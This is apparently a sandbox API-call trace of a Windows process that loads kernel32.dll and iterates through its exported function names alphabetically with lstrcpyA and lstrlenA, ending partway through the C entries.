[0082.296] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.296] lstrlenA (lpString="kernel32.dll") returned 12 [0082.296] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.297] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.297] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.297] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.297] lstrlenA (lpString="ADDATOMA") returned 8 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.297] lstrlenA (lpString="ADDATOMW") returned 8 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.297] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.297] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.297] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.297] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.297] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.297] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.297] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.297] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.297] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.297] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.297] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.297] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.297] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.298] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.298] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.298] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.298] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.298] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.298] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.298] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.298] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.298] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.298] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.298] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.298] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.298] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.298] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.298] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.298] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.298] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.298] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.299] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.299] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.299] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.299] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.299] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.299] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.299] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.299] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.299] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.299] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.299] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.299] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.299] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.299] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.299] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.299] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.299] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.299] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.300] lstrlenA (lpString="BEEP") returned 4 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.300] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.300] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.300] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.300] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.300] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.300] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.300] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.300] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.300] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.300] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.300] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.300] lstrlenA (lpString="CANCELIO") returned 8 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.300] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.300] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.300] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.300] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.300] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.300] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.301] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.301] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.301] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.301] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.301] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.301] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.301] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.301] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.301] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.301] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.301] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.301] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.301] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.301] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.301] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.301] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.301] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.302] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.302] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.302] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.302] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.302] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.302] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.302] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.302] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.302] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.302] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.302] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.302] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.302] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.302] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.302] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.303] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.303] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.303] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.303] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.303] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.303] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.303] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.303] lstrlenA (lpString="COPYFILEA") returned 9 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.303] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.303] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.303] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.303] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.303] lstrlenA (lpString="COPYFILEW") returned 9 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.303] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.303] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.303] lstrlenA 